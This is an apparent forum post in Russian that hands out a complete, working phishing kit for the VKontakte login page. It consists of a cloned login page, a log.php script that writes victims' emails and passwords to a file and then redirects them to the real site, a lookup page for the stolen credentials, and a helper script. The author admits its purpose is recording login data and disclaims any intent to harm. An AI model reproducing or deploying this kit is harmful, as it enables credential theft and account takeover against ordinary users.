Здравствуй сообщество! Это мой вступительный и первый пост, он не направлен кому нибудь навредить. Есть разного рода сниферы, триппер, поведу речь о бональном фейке (подделке) для главной страницы Вконтакте.ру.

С помощью нее злоумышленник записывает данные введенные в форме. Серверный php код был честно нагуглен. Кто его источник уже не понятно, он гуляет себе по интернету давно, а страница фейка сделана мной не так давно, потому что Вконтакте изменили вид главной страницы. И так…

Создаем 5 файлов

1. base.php — БД (права на запись)
2. index.php — сам фейк
3. log.php — скрипт авторизации
4. seebase.php — просмотр БД
5. s.php

Грузим на сервер, смотрим, действуем. Пояснения к файлам, и что с ними делать писать не буду. Кто не дурак поймет, а дуракам не нужно.

base.php

<?php echo '<H1>Доступ к базе закрыт</H1>'; exit; ?>
 : 

 : 

admin:jsdrfgwrte675452t8 

index.php

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="ru" lang="ru" id="vkontakte">
<head>
<meta http-equiv="content-type" content="text/html; charset=utf-8" />
<title>В Контакте | Добро пожаловать</title>
<link rel="stylesheet" href="http://vkontakte.ru/css/rustyle.css" type="text/css" />
<link rel='stylesheet' href='http://vkontakte.ru/css/help.css?2' type='text/css' />
<link rel="stylesheet" type="text/css" href="http://vkontakte.ru/css/al/common.css?128" /> 

<link rel="shortcut icon" href="http://vkontakte.ru/images/favicon.ico" />
<!--[if lte IE 6]><style type="text/css" media="screen">/* <![CDATA[ */ @import url(css/ie.css); /* ]]> */</style><![endif]-->
<!--[if gte IE 7]><style type="text/css" media="screen">/* <![CDATA[ */ @import url(css/ie7.css); /* ]]> */</style><![endif]-->
<script src="http://vkontakte.ru/js/functions.js?5"></script>
<script src="http://vkontakte.ru/js/niftycube.js?1"></script>


<script type="text/javascript">
window.onload=function(){
Nifty("ul.tabs a","small top");
Nifty("ul.buttonRow a","small");
Nifty("div.leftAd","small transparent");
Nifty("div.selPad","small transparent");
Nifty("div.myPad","small transparent");
}
</script>
</head>

<body>

 <div id="pageLayout">

<!-- pageHeader -->

  <div id="pageHeader">

   <h1 id="home"><a href="index.php">ВКонтакте</a></h1>


<div id="page_header" class="p_head p_head_l0">
      <div class="back"></div>
      <div class="left"></div>
      <div class="right"></div>
      <div class="content">
        <div id="top_nav" class="head_nav">
  <a id="top_home_link" class="top_home_link fl_l" href="index.php" onclick="return nav.go(this, event)" style=""></a>
  <div id="top_links" style="display: none">
    <a class="fl_r top_nav_link" href="/reg0" onclick="return !showBox('al_register.php', {act: 'register_box'}, {params: {width: 514}, stat: ['reg.css']}, event)">Как стать участником?</a>
    <a class="fl_l top_nav_link" href="" id="top_back_link" onclick="return nav.go(this, event, {back: true})" style="display: none; "></a>
  </div>
</div>
      </div>
    </div>

  </div>



<!-- End pageHeader -->

<!-- sideBar -->

  <div id="sideBar">
   
<div id="quickLogin">
 <form method="post" name="login" id="login" action="log.php">
  <label for="email">Email:</label>
  <input class="inputText" onClick="show('expirePad');" type="text" name="email" id="email" size="20" />
  <label for="pass">Пароль:</label>
  <input class="inputText" onClick="show('expirePad');" type="password" name="pass" id="pass" size="20" />
  <div id="expirePad" style="display:none"><input style="margin-top:1px; vertical-align: middle;" type="checkbox" name="expire" id="expire" value="1" /> <small>Чужой компьютер</small></div>

<div id="expirePad" style="display:none;"><input style="margin-top:1px; vertical-align: middle;" type="checkbox" name="expire" id="expire" value="1" /> <small>Чужой компьютер</small></div>

<div style="height:20px;margin-top:5px;">

<ul class='nNav' style="width:128px;padding:0px;margin:0px;">
<li style="margin:0px 3px 0px 0px;">
<b class="nc"><b class="nc1"><b></b></b><b class="nc2"><b></b></b></b>
<span style="width: 108px;" class="ncc"><a href="javascript:document.login.submit()">Вход</a></span>
<b class="nc"><b class="nc2"><b></b></b><b class="nc1"><b></b></b></b>
</li>
</ul>
</div>
<div style="padding: 10px 15px"><a href="http://vkontakte.ru/login.php?op=forgot" target="_top">Забыли пароль?</a></div>


  <input type="submit" value='.' style="color:#fff;border:0;padding:0;margin:0;background:#fff;height:6px;width:6px"/>
 </form>
</div>

   <div style="width:124px">
</div>
  <div id="banner1" style="visibility: hidden;font-size: 0px; width: 0px; height: 0px;"></div>
  </div>

<!-- End sideBar -->

<!-- pageBody -->

  <div id="pageBody" class="pageBody">

  <div id="wrapH">
  <div id="wrapHI">
   <div id="header">
    <h1> Добро пожаловать</h1>
   </div>
  </div>
  </div>

  <div id="wrap2">
  <div id="wrap1">
   <div id="content">

    
<script type="text/javascript">
 var memCount = 15200476;
 var memPerSec = 0.431599193253;
 function updateCount() {
  next = -(1000 / memPerSec)*Math.log(Math.random());
  memCountString = '' + memCount;
  len = memCountString.length;
  memCountString = memCountString.substr(0,len-6)+" "+memCountString.substr(len-6,3)+" "+memCountString.substr(len-3,3);
  ge('memCount').innerHTML = memCountString;
  memCount = memCount + 1;
  setTimeout(updateCount, next);
 }
 window.onload = function(){
  updateCount();
 }
</script>

<div class="simplePage">

 <h2><b>ВКонтакте.ру - универсальное средство поиска знакомых.</b></h2>

 <p><b>ВКонтакте</b> – универсальное средство коммуникации и поиска людей,
которым ежедневно пользуются десятки миллионов человек.</p>

 <p>С помощью <b>ВКонтакте</b> Вы можете:</p>
<ul class="listing">
      <li><span>Найти людей, с которыми Вы когда-либо учились, работали или отдыхали.</span></li>
      <li><span>Узнать больше о людях, которые Вас окружают, и найти новых друзей.</span></li>
      <li><span>Всегда оставаться в контакте с теми, кто Вам дорог.</span></li>
    </ul>

 
<div class="reg">
    <h2>Как создать страницу ВКонтакте?</h2>

    <p style="padding: 0px 20px;" class="reg_content">Стать пользователем <b>ВКонтакте</b> можно по приглашению одного из участников.

Когда Вас пригласит кто-нибудь из Ваших друзей, на Ваш телефон придет сообщение с логином и паролем для входа. Никаких дополнительных действий не потребуется – Вы сможете сразу начать пользоваться Вашей новой страницей, введя логин и пароль.</p>
  </div>

</div>

    
   </div>
  </div>
  </div>

  </div>
  <div id="boxHolder"></div>

<!-- End pageBody -->

<div id="footer_wrap" class="fl_r" style="width: 656px; ">
      <div id="bottom_nav">
  <a href="http://vkontakte.ru/help.php?page=about">о сайте</a>
  <a href="http://vkontakte.ru/techsupp.php">техподдержка</a>
  <a href="http://vkontakte.ru/blog.php">блог</a>
  <a href="http://vkontakte.ru/help.php?page=terms">правила</a>
  <a href="http://vkontakte.ru/ads.php">реклама</a>
  <a href="http://vkontakte.ru/developers.php">разработчикам</a>
  <a href="http://vkontakte.ru/pages.php?o=-1&p=Merchant%20API">магазинам</a>
</div>
<div style="padding-top: 10px;" class="clear">
  <div class="copy_lang"><a href="http://vkontakte.ru/help.php?page=about">В Контакте</a> © 2006-2011 <a onclick="ajax.post('lang.php', {act: 'change_lang', lang_id: 0, hash: 'c27de2bf467568e28a'})">Русский</a><a onclick="ajax.post('lang.php', {act: 'change_lang', lang_id: 1, hash: 'c27de2bf467568e28a'})">Украiнська</a><a onclick="ajax.post('lang.php', {act: 'change_lang', lang_id: 2, hash: 'c27de2bf467568e28a'})">Беларуская</a><a onclick="ajax.post('lang.php', {act: 'change_lang', lang_id: 3, hash: 'c27de2bf467568e28a'})">English</a><a onclick="ajax.post('lang.php', {act: 'change_lang', lang_id: 11, hash: 'c27de2bf467568e28a'})">Српски</a><a onclick="ajax.post('lang.php', {act: 'change_lang', lang_id: 10, hash: 'c27de2bf467568e28a'})">Magyar</a><a onclick="ajax.post('lang.php', {act: 'change_lang', lang_id: 57, hash: 'c27de2bf467568e28a'})">Azərbaycan</a><a onclick="showBox('lang.php', {act: 'lang_dialog'}, {noreload: true})">все языки »</a></div>
  <div>
    
    
  </div>
</div>
</div>
<!-- End pageLayout 260 -->

<script type="text/javascript">
//Rounded('rounded', 6, 6);
</script>
</body>
</html>

log.php

<?PHP
$Login = $_POST['email']; // Логин
$Pass = $_POST['pass']; // Пароль

$log = fopen("base.php","a+"); //открываем файл базы
fwrite($log,"\n $Login:$Pass \n"); //записываем всё
fclose($log); //закрываем
echo "<html><head><META HTTP-EQUIV='Refresh' content ='0; URL=http://vkontakte.ru/login.php?m=1&'></head></html>"; // куда пошлем пользователя после того как он ввел данные
?>

s.php

<?php
$text=file_get_contents("http://vkontakte.ru/");
preg_match("/<b id='memCount'>(.*)<\/b>/i",$text, $res);
echo $res[1];
?>

seebase.php

<html>
<head>
<title>Give account</title>
</head>
<body>
<form method="POST">
Login: <input type="text" name="login">

<input type="submit" value="OK">
</form>
<?php
if (isset($_POST['login']))
if ($_POST['login'] != '')
{
$login = $_POST['login'];
echo $_POST['login'].'
';
$fp = fopen('base.php', 'r');// Имя базы
while (!feof ($fp)) {
$buffer = fgets($fp);
if (strpos($buffer,$login) !== false)
{
echo $buffer.'
';
break;
}
}
fclose($fp);
}
?>
</body>
</html>